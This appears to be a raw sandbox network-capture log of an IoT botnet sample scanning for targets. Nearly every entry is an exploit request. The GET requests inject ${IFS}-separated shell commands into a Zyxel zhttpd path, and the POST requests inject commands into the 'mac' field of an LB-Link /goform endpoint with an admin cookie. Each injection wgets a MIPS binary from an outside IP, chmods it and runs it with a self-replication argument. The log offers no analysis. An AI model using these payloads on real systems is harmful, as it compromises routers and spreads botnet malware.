                                                Jan 28, 2024 10:16:31.911780119 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6163192.168.2.2337844201.139.9.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.911798000 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6164192.168.2.2339872110.89.44.63443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.911814928 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6165192.168.2.2333346102.205.142.135443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.911815882 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6166192.168.2.2333760213.96.34.134443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.911854029 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6167192.168.2.2346156117.36.134.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.911880016 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6168192.168.2.2339722198.48.90.37443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.911900997 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6169192.168.2.235129091.135.70.154443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.911921978 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6170192.168.2.234969850.123.188.63443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.911952972 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6171192.168.2.233674898.199.214.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.911974907 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6172192.168.2.2339724131.207.238.211443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.912003994 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6173192.168.2.235797241.73.69.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.912034035 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6174192.168.2.23590028.130.91.139443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.912060022 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6175192.168.2.2353368140.227.198.49443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.912089109 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6176192.168.2.234793457.1.223.243443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.912111044 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6177192.168.2.2335892203.32.253.109443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.912136078 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6178192.168.2.235621276.102.228.142443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.912178993 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6179192.168.2.234155044.194.45.216443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.912219048 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6180192.168.2.2346420201.51.156.41443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.912228107 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6181192.168.2.2348440131.128.64.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.912240028 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6182192.168.2.2347626107.30.139.138443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.912275076 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6183192.168.2.2335404173.197.190.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.912275076 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6184192.168.2.235243275.0.133.156443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.912287951 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6185192.168.2.234019283.212.98.47443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.912295103 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6186192.168.2.235695825.190.71.130443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.912313938 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6187192.168.2.23386584.128.118.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.912338972 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6188192.168.2.2358384150.31.200.211443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.912393093 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6189192.168.2.233766882.192.162.5443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.912396908 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6190192.168.2.234591046.195.96.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.912422895 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6191192.168.2.2347682102.67.176.22443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.912453890 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6192192.168.2.234703038.94.231.49443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.912482023 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6193192.168.2.2342992158.242.93.98443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.915147066 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6194192.168.2.2339222209.35.246.118443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.915163994 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6195192.168.2.235839242.178.231.187443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.915186882 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6196192.168.2.234420658.152.118.123443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.915239096 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6197192.168.2.233280259.221.207.240443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.915266037 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6198192.168.2.2341608149.199.77.47443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.915297985 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6199192.168.2.236014239.223.44.139443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.915313959 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6200192.168.2.234904449.158.20.28443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.915348053 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6201192.168.2.235868482.131.14.868080
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.033982992 CET245OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                Cookie: user=admin
                                                Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 34 36 2f 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.245.236.146/skyljnee.mpsl; chmod 777 skyljnee.mpsl; ./skyljnee.mpsl lblink.selfrep;rm *mpsl*;
                                                Jan 28, 2024 10:16:32.263865948 CET128INHTTP/1.0 302 Redirect
                                                Server: PS HTTP Server
                                                Location: /index.asp
                                                Content-type: text/html
                                                Connection: close
                                                Jan 28, 2024 10:16:33.257800102 CET128INHTTP/1.0 302 Redirect
                                                Server: PS HTTP Server
                                                Location: /index.asp
                                                Content-type: text/html
                                                Connection: close
                                                Jan 28, 2024 10:16:35.261765003 CET128INHTTP/1.0 302 Redirect
                                                Server: PS HTTP Server
                                                Location: /index.asp
                                                Content-type: text/html
                                                Connection: close
                                                Jan 28, 2024 10:16:39.257831097 CET128INHTTP/1.0 302 Redirect
                                                Server: PS HTTP Server
                                                Location: /index.asp
                                                Content-type: text/html
                                                Connection: close


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6202192.168.2.235848458.239.168.38080
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.102384090 CET245OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                Cookie: user=admin
                                                Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 34 36 2f 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.245.236.146/skyljnee.mpsl; chmod 777 skyljnee.mpsl; ./skyljnee.mpsl lblink.selfrep;rm *mpsl*;
                                                Jan 28, 2024 10:16:32.484925032 CET245OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                Cookie: user=admin
                                                Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 34 36 2f 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.245.236.146/skyljnee.mpsl; chmod 777 skyljnee.mpsl; ./skyljnee.mpsl lblink.selfrep;rm *mpsl*;
                                                Jan 28, 2024 10:16:33.380790949 CET245OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                Cookie: user=admin
                                                Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 34 36 2f 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.245.236.146/skyljnee.mpsl; chmod 777 skyljnee.mpsl; ./skyljnee.mpsl lblink.selfrep;rm *mpsl*;
                                                Jan 28, 2024 10:16:35.172538042 CET245OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                Cookie: user=admin
                                                Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 34 36 2f 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.245.236.146/skyljnee.mpsl; chmod 777 skyljnee.mpsl; ./skyljnee.mpsl lblink.selfrep;rm *mpsl*;
                                                Jan 28, 2024 10:16:38.948045015 CET245OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                Cookie: user=admin
                                                Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 34 36 2f 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.245.236.146/skyljnee.mpsl; chmod 777 skyljnee.mpsl; ./skyljnee.mpsl lblink.selfrep;rm *mpsl*;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6203192.168.2.2356842170.241.208.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.920937061 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6204192.168.2.235247236.89.251.98443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.920950890 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6205192.168.2.2338730206.103.11.176443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.920969009 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6206192.168.2.2358100103.201.29.171443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.920991898 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6207192.168.2.2357900138.15.189.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.921013117 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6208192.168.2.2341330117.69.189.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.921041012 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6209192.168.2.2342520134.102.55.130443
                                                TimestampBytes transferredDirectionData
